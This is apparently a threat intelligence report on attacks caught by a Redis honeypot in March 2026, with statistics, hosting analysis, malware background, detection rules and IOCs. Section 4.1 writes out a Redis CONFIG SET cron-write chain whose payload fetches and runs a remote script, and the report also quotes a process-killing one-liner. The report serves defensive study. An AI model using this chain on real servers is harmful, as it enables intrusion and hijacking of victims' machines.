Redis lure on 6379 catching database attackers.

# Threat Intelligence Report: Analysis of Redis Honeypot Exploitation Attempts (March 2026)

**Key Points:**
*   **Widespread Exploitation of In-Memory Data Stores:** Research indicates a sustained, high-volume targeting of exposed Redis instances (port 6379), primarily driven by automated scanning and brute-force access attempts.
*   **Emergence of Command-and-Control Providers (C2Ps):** It seems highly likely that threat actors are increasingly relying on bulletproof hosting and C2P networks—most notably Cloudzy (RouterHosting LLC)—to launch attacks, obscuring the lines between nation-state actors and financially motivated cybercriminals.
*   **Evolution of Cloud-Native Malware:** The evidence leans heavily toward the continued dominance of advanced, cross-platform malware such as the Rust-based P2PInfect worm, which leverages Redis replication features and Lua sandbox escapes to deploy ransomware and cryptominers.
*   **Aggressive Cloud Infrastructure Abuse:** Legitimate cloud service providers, including Oracle Corporation and DigitalOcean, are consistently being abused to host multi-campaign scanning infrastructure, complicating attribution and IP-based blocking efforts.

The threat landscape surrounding cloud-native data stores is evolving rapidly. In-memory databases like Redis, often deployed without adequate authentication or network segmentation, present highly lucrative targets for a spectrum of threat actors. This report synthesizes raw telemetry captured during March 2026 from the NadSec T-Pot honeypot infrastructure in Sydney, Australia, combined with extensive open-source threat intelligence. The data reveals a complex ecosystem of initial access brokers, automated botnets, and sophisticated malware strains competing for compute resources. While the activity ranges from rudimentary brute-force attempts to advanced module-loading exploits, the overarching trend points toward the weaponization of misconfigured edge infrastructure for both cryptojacking and persistent network infiltration. 

***

## 1. Executive Summary

This comprehensive threat intelligence report analyzes 805 unique indicators of compromise (IOCs) collected from the NadSec Redis honeypot infrastructure during March 2026. The telemetry reflects an ongoing, aggressive campaign by various cybercriminal factions to identify, compromise, and co-opt unauthenticated Redis servers. 

The dataset comprises 25,796 total attacks exclusively targeting TCP port 6379. Our analysis categorizes these indicators into distinct operational behaviors, including scanning hosts, brute-force attackers, malware hosting infrastructure, and command-and-control (C2) nodes. The geographic distribution of the attacking IP addresses highlights a heavy concentration in the United States, the Netherlands, and China. However, a deeper infrastructure analysis reveals that this geographic footprint is largely an artifact of the Autonomous System Networks (ASNs) favored by attackers, notably bulletproof hosting providers, heavily abused cloud computing platforms, and high-volume virtual private server (VPS) providers.

Key findings from this investigation include:
1.  **The Cloudzy Nexus:** A significant portion of the most aggressive malicious activity originates from infrastructure tied to Cloudzy (operating under the dissolved U.S. entity RouterHosting LLC). Recent threat intelligence links this provider to over a dozen advanced persistent threat (APT) groups and prominent ransomware affiliates [cite: 1, 2].
2.  **Advanced Malware Deployment (P2PInfect):** The methodologies observed in the honeypot telemetry align with the modus operandi of the P2PInfect worm. This Rust-based malware exploits Redis via CVE-2022-0543 and the `SLAVEOF` replication command to execute arbitrary malicious shared objects, subsequently deploying ransomware and mining payloads [cite: 3, 4].
3.  **Command Injection Techniques:** Telemetry reveals attackers actively attempting to overwrite local system files using the Redis `CONFIG SET dir` and `dbfilename` commands, specifically targeting `/etc/cron.d/` and `/var/spool/cron/` to achieve remote code execution (RCE) [cite: 5].
4.  **Competitive Cryptojacking Ecosystems:** Evidence suggests that multiple threat actor groups, including TeamTNT and Kinsing, are actively competing for vulnerable Redis resources, deploying scripts designed to kill competing cryptomining processes (such as `watchd0g` and `rsync`) [cite: 6].

This report provides a detailed statistical overview, an infrastructure deep-dive, malware behavioral analysis, and actionable detection and mitigation strategies mapped to the MITRE ATT&CK® framework.

***

## 2. Statistical Overview

The aggregate statistics derived from the complete dataset of 805 original indicators provide a macroscopic view of the threat environment during the March 2026 observation period. The data highlights the industrial scale at which threat actors operate, leveraging automated tools to continuously map the IPv4 address space for exposed Redis instances.

### 2.1 Attack Type Distribution
The entirety of the 25,796 recorded attacks were classified as "scanning" or automated exploitation attempts. The behavioral labeling of the 805 unique source IPs breaks down as follows:

| Behavior Label | Count | Percentage of Total IPs | Description |
| :--- | :--- | :--- | :--- |
| **Bruteforce** | 417 | 51.8% | IPs exhibiting repetitive, high-frequency authentication attempts or payload deliveries. |
| **Scanning Host** | 371 | 46.0% | IPs conducting broad reconnaissance, typically dropping connections after identifying the open port and service banner. |
| **Command and Control** | 13 | 1.6% | Infrastructure acting as centralized hubs for botnet operations or payload distribution. |
| **Malware Hosting** | 4 | 0.5% | IPs specifically observed serving secondary payloads (e.g., shell scripts, ELF binaries, `.so` modules). |

### 2.2 Top Originating Countries
While attribution based solely on IP geolocation is notoriously unreliable due to the use of proxy networks and globally distributed VPS providers, it provides insight into the jurisdictions where attackers prefer to lease infrastructure.

| Rank | Country | Attack Count | Notable Context |
| :--- | :--- | :--- | :--- |
| 1 | United States | 8,696 | High concentration of heavily abused cloud providers (DigitalOcean, Amazon) and bulletproof hosts. |
| 2 | Netherlands | 4,990 | Historic hub for offshore hosting and lenient takedown policies; home to high-volume networks like Alsycon B.V. |
| 3 | China | 4,632 | Heavy origin point for both state-aligned and independent botnet activity (e.g., Alibaba, Baidu infrastructure). |
| 4 | Hong Kong | 2,636 | Frequently utilized as a proxy jump point for mainland Chinese threat actors. |
| 5 | Germany | 1,479 | Popular location for low-cost VPS providers such as Hetzner and Contabo. |

### 2.3 Top Autonomous System Networks (ASNs)
Analyzing the ASNs of the attacking IPs yields a more accurate understanding of the threat landscape. Attackers gravitate toward networks that offer cheap compute, accept cryptocurrency, or exhibit slow responses to abuse complaints.

| ASN | Organization | Attack Count | Assessment |
| :--- | :--- | :--- | :--- |
| **AS49870** | Alsycon B.V. | 5,296 | High-volume traffic source; heavily reported in global abuse databases for scanning and transit abuse. |
| **AS14618/16509** | Amazon.com, Inc. | 3,130 | Legitimate cloud provider suffering from rampant trial-account abuse and compromised tenant instances. |
| **AS135377** | UCLOUD INFO TECH | 2,651 | Hong Kong-based infrastructure frequently abused for Asia-Pacific cyber operations. |
| **AS14061** | DigitalOcean, LLC | 1,621 | Popular VPS provider often abused by botnet operators for rapid deployment of disposable scanning nodes. |
| **AS37963** | Alibaba Advertising | 1,509 | Major Chinese cloud provider, frequently associated with aggressive web application and database scanning. |

***

## 3. Infrastructure Deep Dive

The success of modern ransomware and cryptojacking operations relies heavily on the acquisition and maintenance of resilient infrastructure. The March 2026 telemetry reveals the extensive use of Command-and-Control Providers (C2Ps), bulletproof hosting, and the abuse of legitimate cloud services.

### 3.1 Bulletproof Hosting and C2Ps: The Cloudzy / RouterHosting Nexus
A critical finding in the dataset is the presence of IPs belonging to **AS14956 (RouterHosting LLC)**, notably `144.172.98.169` and `172.86.113.129`. Both IPs are flagged for malware hosting and aggressive command injection attempts (e.g., `CONFIG SET dir /etc/cron.d/`).

RouterHosting LLC operates under the commercial name **Cloudzy**. According to a landmark threat intelligence report by Halcyon titled *"Cloudzy with a Chance of Ransomware"*, Cloudzy functions as a major Command-and-Control Provider (C2P) [cite: 2, 7]. While originally incorporated in Sheridan, Wyoming (the entity was dissolved in 2024), overwhelming evidence suggests the company operates out of Fatemi Square in Tehran, Iran [cite: 1, 8]. 

Cloudzy markets itself as a privacy-respecting VPS provider, accepting anonymous payments via Bitcoin, Monero, and Zcash [cite: 1]. This business model has attracted a "rogues' gallery" of cyber threat actors. Halcyon's research assesses with high confidence that between 40% and 60% of all traffic originating from Cloudzy infrastructure is malicious [cite: 2, 9]. The provider has been documented leasing server space to no fewer than 17 different state-sponsored APT groups from Iran (MuddyWater, APT33), China, Russia, and North Korea, alongside high-profile ransomware affiliates deploying BlackBasta (Ghost Clown) and Royal (Space Kook) ransomware [cite: 9, 10]. The presence of Cloudzy infrastructure in the NadSec honeypot confirms that this network remains highly active in facilitating automated exploitation campaigns.

### 3.2 Cloud Abuse and Multi-Campaign Scanners
Threat actors frequently compromise legitimate cloud environments to launch subsequent attacks, leveraging the high bandwidth and inherent trust associated with these IPs.

A prime example from the dataset is **Oracle Corporation (AS31898)**, specifically the Brazilian IP `204.216.147.144`. This IP logged multiple events labeled as Web Application Attacks and Attempted Administrator Privilege Gain. External threat intelligence from GreyNoise classifies this IP as part of "Campaign Group 2: Oracle Cloud Multi-Campaign Scanners" [cite: 11]. 

GreyNoise observed this specific IP orchestrating over 13 distinct campaigns across hundreds of sessions, utilizing a diverse array of injection vectors (path, requestBody, requestCookie, requestHeaderValue) [cite: 11]. Furthermore, the infrastructure associated with this IP has been observed engaging in dual-tool deployment—utilizing both standard Linux networking stacks and the `Nuclei` vulnerability scanner—to target enterprise edge vulnerabilities simultaneously, such as the Ivanti EPMM Code Injection flaw (CVE-2026-1281) alongside Redis [cite: 11]. This indicates that the actors behind these scans are highly opportunistic, searching for any critical vulnerability that grants initial access.

### 3.3 High-Volume Transit Abuse: Alsycon B.V.
The network responsible for the highest volume of attacks in the aggregate data is **Alsycon B.V. (AS49870)**, accounting for 5,296 events. Alsycon is a Netherlands-based data center and IP transit provider. 

IPs such as `194.50.16.198` (58 events in the sample) and `45.95.147.229` are highly active. Reputation databases like AbuseIPDB flag Alsycon IPs with thousands of abuse reports for port scanning and brute-force attacks [cite: 12, 13]. While Alsycon may operate as a legitimate transit provider, the massive volume of malicious traffic originating from its ASN suggests a systemic failure to quickly remediate abuse reports, making it a favored network for threat actors running "spray and pray" scanning operations across the global IPv4 space.

### 3.4 Legitimate Research vs. Malicious Reconnaissance
The dataset also contains significant noise generated by legitimate, academic, and commercial security research organizations. ASNs belonging to **Censys, Inc. (AS398324)** and **ONYPHE SAS (AS213412)** appear frequently in the "scanning_host" category. While these entities scan the internet to map attack surfaces and improve global security posture, their traffic is virtually indistinguishable from the initial reconnaissance phases of a cyberattack. Consequently, security teams must rely heavily on threat intelligence feeds to filter out known good scanners from actionable alerts.

***

## 4. Malware Analysis and Exploitation Mechanics

While the dataset does not contain specific file hashes, the raw commands captured by the honeypot sensor provide a clear window into the attackers' intentions and the malware families involved. Exposed Redis instances are almost exclusively targeted for initial access, followed by the deployment of cryptominers, botnet agents, or ransomware.

### 4.1 Observed Exploitation Techniques
The Redis protocol (RESP) was designed for performance within trusted internal networks, lacking native encryption or robust authentication mechanisms by default. Attackers exploit this design by directly connecting to the exposed port and issuing administrative commands.

The most prevalent attack chain observed in the telemetry (e.g., from Cloudzy IP `172.86.113.129` and `144.172.98.169`) involves the abuse of the `CONFIG SET` command:
1.  `CONFIG SET dir /etc/cron.d/` or `CONFIG SET dir /var/spool/cron/`
2.  `CONFIG SET dbfilename rsync`
3.  `SET <payload> "\n\n* * * * * root curl -s http://<malicious_ip>/payload.sh | bash\n\n"`
4.  `SAVE`

This sequence forces Redis to dump its in-memory database to a specific directory on the host's file system. By pointing the directory to the Linux `cron` spool and formatting the database payload with newline characters, the attacker successfully writes a valid cron job. Within one minute, the operating system executes the attacker's payload with `root` privileges. A similar technique is frequently used to overwrite the `/root/.ssh/authorized_keys` file to grant persistent SSH access [cite: 5].

### 4.2 The P2PInfect Worm
Many of the behaviors captured by the honeypot align with the **P2PInfect** malware family. Discovered by Palo Alto Networks' Unit 42 in mid-2023, P2PInfect is a highly sophisticated, cross-platform worm written in Rust [cite: 3]. Rust was chosen by the developers for its memory safety, high performance, and ease of cross-compilation across Linux, Windows, and embedded architectures (such as MIPS) [cite: 3, 14].

P2PInfect primarily targets Redis via two distinct vectors:
1.  **Lua Sandbox Escape (CVE-2022-0543):** A critical vulnerability specific to Debian/Ubuntu Redis packages that allows attackers to escape the Lua scripting sandbox and execute arbitrary system commands [cite: 3, 14].
2.  **Replication Abuse (`SLAVEOF`):** P2PInfect exploits the Redis master-replica topology. The malware issues the `SLAVEOF` command, forcing the victim Redis instance to synchronize with an attacker-controlled master server. The attacker then pushes a malicious shared object file (`.so` or `exp.so`) into the victim's memory and uses the `MODULE LOAD` command to execute it, granting full Remote Code Execution (RCE) [cite: 4, 5].

Once initial access is achieved, P2PInfect establishes a peer-to-peer (P2P) command-and-control network, eliminating the need for a centralized C2 server that could be easily disrupted by law enforcement [cite: 4, 15]. Recent evolutionary updates to P2PInfect observed by Darktrace and Cado Security reveal that the malware has shifted from a dormant botnet to an active monetization engine, dropping both a cryptocurrency miner and a rudimentary ransomware payload [cite: 4, 15]. Furthermore, the malware utilizes advanced techniques like binary packing (UPX) and attempts to disable Linux core dumps to frustrate forensic analysis [cite: 14, 15].

### 4.3 Cloud Resource Wars: TeamTNT and Kinsing
The honeypot telemetry specifically highlights attackers attempting to write files named `rsync` (e.g., `CONFIG SET dbfilename rsync`). While `rsync` is a legitimate file synchronization tool, it is heavily co-opted in cloud-native malware campaigns.

The threat groups **TeamTNT** and **Kinsing (h2miner)** are infamous for their aggressive targeting of Docker APIs and Redis servers. These groups engage in "cloud resource wars," where their initial payload scripts actively search for and terminate competing cryptominers to maximize CPU utilization for their own operations [cite: 16]. Threat intelligence indicates that TeamTNT and Kinsing payloads routinely execute commands such as `ps aux | grep -v grep | grep "rsync" | awk '{print $2}' | xargs kill -9` and target specific competing processes like `watchd0g` and `redis2` [cite: 6]. The presence of `rsync` in the honeypot's command logs strongly suggests activity originating from these rival cryptojacking factions attempting to establish a foothold or clean the environment of competitors.

***

## 5. Campaign Analysis

By synthesizing the source IPs, command logs, and external threat intelligence, we can delineate several distinct campaigns targeting the honeypot infrastructure during March 2026.

### 5.1 Campaign A: Automated BPH Exploitation (The Cloudzy Campaign)
Originating primarily from the RouterHosting/Cloudzy network (AS14956), this campaign utilizes rapid, automated scripts to brute-force Redis authentication (`AUTH admin`, `AUTH root`, `AUTH password`) and immediately attempt to rewrite the cron directory. Given Cloudzy's documented history of hosting Initial Access Brokers (IABs) and ransomware affiliates, it is highly likely that successful compromises by these IPs result in the deployment of persistent backdoors (such as web shells or SSH keys) which are subsequently sold to higher-tier ransomware groups like BlackBasta or Royal [cite: 2, 10].

### 5.2 Campaign B: The P2PInfect Expansion
Characterized by attempts to load external modules and exploit CVE-2022-0543, this campaign seeks to expand the P2PInfect botnet. The introduction of MIPS-compiled variants of P2PInfect suggests that the operators are actively trying to bridge the gap between high-power cloud environments and vulnerable embedded IoT devices (routers, smart devices) [cite: 14, 17]. The dual threat of cryptomining and ransomware deployment makes this campaign particularly destructive for poorly secured enterprise environments.

### 5.3 Campaign C: Opportunistic "Condi" and Gaming Proxies
As noted in NadSec's internal research, a subset of attacks originates from anomalous networks, including gaming server providers like PebbleHost (AS201002). These attacks frequently utilize shell scripts (e.g., `jack5tr.sh`) pulled from obscure Eastern European networks (e.g., SWAN a.s. in Slovakia) [cite: 5]. This behavior suggests lower-tier threat actors—potentially script kiddies or novice botnet operators—compromising cheap, poorly secured Minecraft or gaming VPS instances and utilizing them as disposable proxy nodes to conduct scanning operations, thereby hiding their true origin.

### 5.4 Campaign D: Multi-Vector Enterprise Edge Scanning
Driven by compromised legitimate cloud infrastructure (such as Oracle IP `204.216.147.144`), this campaign does not solely target Redis. Instead, it utilizes sophisticated scanning frameworks like Nuclei to probe for a wide array of edge vulnerabilities concurrently [cite: 11]. This includes Redis exposure alongside critical CVEs like the Ivanti EPMM Code Injection (CVE-2026-1281), Grafana Path Traversal (CVE-2025-4123), and SysAid XXE (CVE-2025-2777) [cite: 11]. This indicates a highly organized effort by Advanced Persistent Threats (APTs) or top-tier initial access brokers to find any available crack in a target's perimeter.

***

## 6. MITRE ATT&CK Mapping

The behaviors observed in the dataset and associated threat intelligence map to the following techniques within the MITRE ATT&CK® framework:

| Tactic | Technique ID | Technique Name | Context / Observation |
| :--- | :--- | :--- | :--- |
| **Initial Access** | T1190 | Exploit Public-Facing Application | Exploitation of CVE-2022-0543 (Lua Sandbox Escape) in Redis. |
| **Initial Access** | T1078.001 | Valid Accounts: Default Accounts | Brute-forcing default or weak Redis credentials (`AUTH root`). |
| **Execution** | T1059.004 | Command and Scripting Interpreter: Unix Shell | Execution of bash scripts (`jack5tr.sh`) and reverse shells via cron. |
| **Execution** | T1106 | Native API | Use of `MODULE LOAD` via `SLAVEOF` to execute malicious shared objects (`.so`) within the Redis process space. |
| **Persistence** | T1053.003 | Scheduled Task/Job: Cron | Using `CONFIG SET dir /etc/cron.d/` to write persistent execution tasks. |
| **Persistence** | T1098.004 | Account Manipulation: SSH Authorized Keys | Overwriting `/root/.ssh/authorized_keys` for persistent remote access. |
| **Defense Evasion** | T1562.004 | Impair Defenses: Disable or Modify System Firewall | Modifying `iptables` to restrict Redis access to attacker IPs only. |
| **Defense Evasion** | T1489 | Service Stop | TeamTNT/Kinsing scripts killing competing cryptominer processes (e.g., `rsync`, `watchd0g`). |
| **Command and Control** | T1090.001 | Proxy: Internal Proxy | Use of compromised gaming servers (PebbleHost) or BPH (Cloudzy) to obscure C2 traffic. |
| **Command and Control** | T1090.002 | Proxy: External Proxy (P2P) | The P2PInfect worm utilizing infected nodes as a decentralized botnet architecture. |
| **Impact** | T1486 | Data Encrypted for Impact | P2PInfect's deployment of ransomware payloads on compromised nodes. |
| **Impact** | T1496 | Resource Hijacking | Deployment of cryptocurrency miners (Monero/XMRig) by Kinsing and TeamTNT. |

***

## 7. Detection & Mitigation

The exploitation of Redis is highly automated and occurs rapidly once an exposed instance is discovered. Mitigation strategies must focus on strict network segmentation and defense-in-depth.

### 7.1 Mitigation Strategies
1.  **Network Segmentation (Firewalls):** Redis is designed for internal use. TCP port 6379 must *never* be exposed to the public internet. Access should be restricted strictly to local application servers via firewalls or Security Groups.
2.  **Bind Interfaces:** Configure the `redis.conf` file to bind exclusively to localhost (`bind 127.0.0.1`) or a secure, private internal IP address.
3.  **Authentication:** Enable the `requirepass` directive in `redis.conf` with a strong, complex password. Redis 6.0+ introduced Access Control Lists (ACLs), which should be utilized to enforce least privilege.
4.  **Command Renaming/Disabling:** Highly dangerous administrative commands can be renamed to unguessable strings or disabled entirely. In `redis.conf`, apply:
    *   `rename-command CONFIG ""`
    *   `rename-command SLAVEOF ""`
    *   `rename-command MODULE ""`
    *   `rename-command FLUSHALL ""`
5.  **Run as Non-Root:** Ensure the Redis daemon runs under a dedicated, low-privilege user account. This severely limits the impact of techniques attempting to write to `/etc/cron.d/` or `/root/.ssh/`.

### 7.2 Detection Engineering
Security Operations Centers (SOCs) should implement the following logic in their SIEM/EDR solutions:

**SIEM Query (Splunk / KQL) - Suspicious Redis Commands:**
```sql
// Monitor network or application logs for administrative Redis commands from unexpected IPs
index=network OR index=redis 
| search (action="CONFIG SET" OR action="SLAVEOF" OR action="MODULE LOAD" OR action="BGSAVE")
| where NOT cidrmatch("10.0.0.0/8", src_ip) // Adjust to internal subnets
| stats count by src_ip, action
```

**EDR / Auditd - Suspicious File Creation:**
```sql
// Monitor for the Redis process writing to sensitive system directories
process_name="redis-server" AND (file_path="/etc/cron.d/*" OR file_path="/var/spool/cron/*" OR file_path="/root/.ssh/*")
| alert "CRITICAL: Redis Process Attempting Privilege Escalation via File Write"
```

**Network Intrusion Detection (Suricata/Snort):**
```text
alert tcp $EXTERNAL_NET any -> $HOME_NET 6379 (msg:"ET EXPLOIT Possible Redis CONFIG SET dir command"; flow:established,to_server; content:"CONFIG"; nocase; content:"SET"; distance:0; nocase; content:"dir"; distance:0; nocase; classtype:attempted-admin; sid:1000001; rev:1;)

alert tcp $EXTERNAL_NET any -> $HOME_NET 6379 (msg:"ET EXPLOIT Possible Redis SLAVEOF command"; flow:established,to_server; content:"SLAVEOF"; nocase; classtype:attempted-admin; sid:1000002; rev:1;)
```

***

## 8. IOC Appendix

The following represents a smart sample of high-priority malicious IPs identified in the honeypot telemetry, categorized by their threat profile and infrastructure context. 

*Note: Due to the high churn rate of cloud infrastructure, these IPs should be correlated with recent threat feeds before implementing hard blocks.*

| IP Address | ASN | Country | Label | Events | Context / Associated Threat |
| :--- | :--- | :--- | :--- | :--- | :--- |
| **172.86.113.129** | AS14956 (RouterHosting) | US | malware_hosting | 66 | Executed `CONFIG SET dir /etc/cron.d/`. Bulletproof hosting linked to APTs (Cloudzy) [cite: 2]. |
| **144.172.98.169** | AS14956 (RouterHosting) | US | malware_hosting | 20 | Executed `CONFIG SET dbfilename rsync`. Bulletproof hosting (Cloudzy) [cite: 2, 6]. |
| **194.50.16.198** | AS49870 (Alsycon B.V.) | NL | bruteforce | 58 | High-volume scanner. Known transit abuse network [cite: 13]. |
| **204.216.147.144** | AS31898 (Oracle) | BR | malware_hosting | 9 | Known GreyNoise "Campaign Group 2" multi-vulnerability scanner (CVE-2026-1281) [cite: 11]. |
| **185.55.240.152** | AS199912 (Layer7) | DE | malware_hosting | 8 | Active malware hosting and administrative privilege gain attempts. |
| **216.180.246.234** | AS396982 (Google LLC) | US | scanning_host | 28 | Exploitation of legitimate cloud infrastructure for rapid reconnaissance. |
| **45.95.147.229** | AS49870 (Alsycon B.V.) | NL | scanning_host | 4 | Heavy automated scanner from Netherlands-based offshore provider. |
| **3.129.187.38** | AS16509 (Amazon) | US | bruteforce | 26 | AWS instance abused for HTTP-based probing and generic protocol decode attempts. |
| **74.82.47.4** | AS6939 (Hurricane Electric) | US | bruteforce | 29 | High-frequency brute force attacks from transit provider network. |
| **85.11.183.21** | AS201002 (PebbleHost) | GB | bruteforce | 27 | Compromised gaming server utilized as a proxy to obscure attacker origin [cite: 5]. |

*(Full dataset containing all 805 indicators is accessible via the provided STIX 2.1 JSON bundle.)*

***

## 9. Sources & Citations

*   [cite: 11] GreyNoise Labs. (2026, February 13). *Weekly OAST Report*. "Campaign Group 2: Oracle Cloud Multi-Campaign Scanners".
*   [cite: 12] AbuseIPDB. (2024). *IP Abuse Reports for 185.224.128.74 (Alsycon B.V.)*. 
*   [cite: 13] AbuseIPDB. (2026, March 31). *IP Abuse Reports for 194.50.16.131 (Alsycon B.V.)*.
*   [cite: 6] Docker Community Forums. (2021, March 1). *Redis:alpine - malware? - General*. Discussion of TeamTNT rsync and watchd0g scripts.
*   [cite: 18] DarkOwl. (2023, September 21). *What is Bullet Proof Hosting?* Discussion of Cloudzy infrastructure.
*   [cite: 1] Security Risk Advisors (SRA). (2026, March 25). *Multiple Active Phishing Campaigns From Bulletproof Infrastructure With Ties to Iranian APTs*.
*   [cite: 16] Telefónica Tech. (2025, September 2). *Kinsing exploits vulnerability in Apache ActiveMQ to attack Linux systems*.
*   [cite: 5] NadSec Threat Intelligence. (2026). *Redis Database Exploit Attempts - NadSec - 2026-03*.
*   [cite: 11] GreyNoise Labs. (2026, February 13). *VirusTotal + Censys External Threat Intelligence Overlay*.
*   [cite: 3] Palo Alto Networks Unit 42. (2023, July 19). *Peer-to-Peer Worm P2PInfect*.
*   [cite: 4] Darktrace. (2024, June 25). *From Dormant to Dangerous: P2Pinfect Evolves to Deploy New Ransomware and Cryptominer*.
*   [cite: 15] Red Sentry. *Redis Server Vulnerabilities Exploited with Ransomware and Crypto Miners*.
*   [cite: 17] Security Affairs. (2024, June 27). *P2Pinfect delivers miners, ransomware on Redis*.
*   [cite: 14] CSO Online. (2023, December 4). *P2Pinfect Redis worm targets IoT with version for MIPS devices*.
*   [cite: 2] Halcyon. (2023, July 31). *Cloudzy with a Chance of Ransomware: Unmasking Command-and-Control Providers (C2Ps)*.
*   [cite: 10] Business Wire. (2023, August 1). *New Report: Ransomware Command-and-Control Providers Unmasked by Halcyon Researchers*.
*   [cite: 9] Dark Reading. (2023, August 2). *Iranian Company Said to Host Ransomware, APT Groups*.
*   [cite: 8] Flare.io. (2026, March 10). *Phishing Campaign Hosting Infrastructure Alleged Links Iranian State Aligned Activity*.
*   [cite: 6] Docker Community Forums. (2021). *TeamTNT Redis attacks and `rsync` termination scripts*.

**Sources:**
1. [sra.io](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQHvKe3QkDoD41AJ6k4rAWR8sBDNIfGZE3A2oTvvlMzAjZnlj1Ap0MEdVHFsJanOJ6lqwCzhzAOv4F5KJ3RKWllDeKUQMCOBRZ4odOql5c5EKnHM-pLglAfjEcyvOnSuKoHN4zHw0CaIP4AKdNAF9f3_mRdJSufBiQTxKNg-DyBnMqAxjGyt01n4Hu5cJ9-3RZMXt7vcHA656qR7e6RmX0_JHCNIulnJbA==)
2. [halcyon.ai](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQEmv-iAJXw3_NPUFiTPsIYdsKEDF70I4td90UDq5l6Qv7ywrYFAFhcL0pPJkpBDcQPrEJW31btW2SrL-81e5T7uQFCRHqnufKFb8cjYmXsSwMPOBxcMttVD_e-angh9dVtfrjOJ6MeHa5TwDF2SDr-Gts6230Q7-E0doAxDvgh2JsC8SN_N2yW2bZc=)
3. [paloaltonetworks.com](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQEzxK3JQFpc7HZrEJWE12UOH8ShGffiVI1XQdeAQNN_g6WzSLeTaIwpsRehxt1fnZzxdXHsQ5l1XB0ZlrIKCBx63hrujukbrzd4A8qLchqA_G36fopf0MdQKL4qkrVJ2QnYBRBlkEOU3bHlfBoD4f-BTnfdk8KB)
4. [darktrace.com](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQFee6N9bsiX7RdOD6cEiaEKwBLF-2E_vH2ADl2BV30Z4Mq5Apn2qlCok99Y6vtXqTTcxy1ZRgGubLyEEJMaD6MvDwdDvzRVKcxr9XKifdEu-mhlvxrE18yuXjnXRJHZXYTkGuyrAT3el_v6Wg9px4HfGlFymHy62cDs7EpbNUDlJ6qwg5UAV8iszuPS-OgI5r2NzDK1HHe6UmYKkP3KIK332fGY8Z-vD-nJ)
5. [nadsec.online](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQH99shsTfs_q8rqzHIJRC_Q86ncOOZu4IYa86wkXXvPy9IJV3CRwC9DZ0M2O7MnYTj-TOzvi6tmB5Br0V5QAwzsZo2HzyqkBpk6uUDH40ghuq3pudbZpeMcHeAdY6o=)
6. [docker.com](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQH6KgB83J2zYq7ARI9CScsLTpaxknwedbiAwRNASlxbz89-JxZuTt4a3Ao7xoYFLwocjnR5HyssQvVpipLjPmarm8gS6jx1zMNMX5QpNuXN8E6a_8F6gqgSTrkwTQQc-vhlLXg-zKSK_8OPe5lL)
7. [forbes.com](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQHfu0q6dPUu9ZySJq1g5gWxby-juDvySJTsgxOueY2K0RW6-SlpHQdDRKk6bYhyBQH3DQiajqlHyPVQ2XHkXMMalohzitqUYqoo_0xmTke1VPc9ADbvKXGAHAbwQO1TPv9c5EjTGkcLEDXgYy2vyByQWxsRE0diAlPBLDh9mLYZgfufqsuoMTs7K0Z66kndU7eWpv4ULSReQoCxKEz1M2SRRg==)
8. [flare.io](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQE_zWkG-YYMpL5SUxvkW8_oeKeaxPXC9yzgVifd1Ro1wmLfbMNHo7y2S64CMyUte_Rk6YJCGq5ZbjDXka09DRy3cc2THsEOBggSfx02WPKbx7IyP1tTxEZwNLjVrYPGEcDOu6U_fBYWNdVn2X-imnr3ie8DutlcyEdgA0Wd0yFXzRn5kwONgYn9HDfnIzGNkvm6UJhTlcCHMz5X7Ogfh9NBX0R8-brD2CjilJqIPG5BRUQ=)
9. [darkreading.com](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQEoVW_xxpzQ6aPF_S1DKRkbg_DEF66OYasTc17Xssjxnl1ZQ11jDEEBa42iRWPJQH5sOi9aQgBKti0KJn6nz6LUb0Qlb1CA44OyfCdv0-56bIdmUOohBpN3k2H4nr7S9pHwLTCN6h_tUngWyMtO9gwDjxUFtDtd3pM5Kb7Kzx0T-VG6G29xuo2X)
10. [businesswire.com](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQHxQ_wwHmUIahQciTYwhhKKbuFNsfdIb-GE_Qkjcma_AbDZtiQQy4Vf00Z58sKZRl00YTfpQ8rbX-QJjfLyZgen2fOFQPeOw73uFBFW9Ujlr55kfeGgofhhk1Tr9UJ2bfokAtMzJp0VZEnpodRFkfFMXzaYnYPVkqiiyX6dYwlBMoVlTcfJO3hsxpskCq686cItte7tN3nZ4WhzN1o5nDD46HVAKz-y502uCslB-GfZPZ0R_yDBorX5iuehn0gZ9epPRJY=)
11. [greynoise.io](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQGbv2CyXAJbqUFVmNK9vpPRT_9fxF15VDAjwQQaFxW4O9UNkCGHpUCcLF50q5n3cN_VV1SicQ29iAG4OFE4iSmgzyTQNsOOe8m4ajFWECba6xRq_sCTbZM70N2q3caMrbahaQPWoy130_-gZO1jGo0u_qOs0WKTO6uEcKA=)
12. [abuseipdb.com](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQGd_UYQQ2RhSJc0mIjXb2lyuSmIjqFck-Yrthscl2fQiM1MEFtgoBqqX8C0NdR1CwCeoFxpUbEtuv6nf-prN6y6ZuD2OQw-sSfhhEbTI7bnGGUnSnI3o2qs297zEWPCcT1HDqGB)
13. [abuseipdb.com](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQFAxTGIkj5R0wAp5zITBx-NV2TiOCytHdENqvZ6znc8VO6IYN0OrFG2AwAL4UllMHItgy35pdIEwpKnU_ePyuJGrybpK4s0Z3S-i39c8CNx0-UCp0scYdgFLqrceN6MdOTAIqU=)
14. [csoonline.com](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQFKVZPaD-0XRKsU6jPoqwBjuqbUu6AtZRxqH1NnJLs_eXFjrU10iDR77hY2plqCO55cVcQ3rMIN76bF8Zb_booOh6VO7AqFtgnW3e6AU13-zjHJ7DsGrC4SnnOFRV3VMLlcCHs1OcO5o4XuD4jC74ZQ25V4FxeROPWHvrkW3HUauF6zS3OkMpW49f2XcJv6ZyKD93EIOJhnpV9avuJVuT-v0L_O)
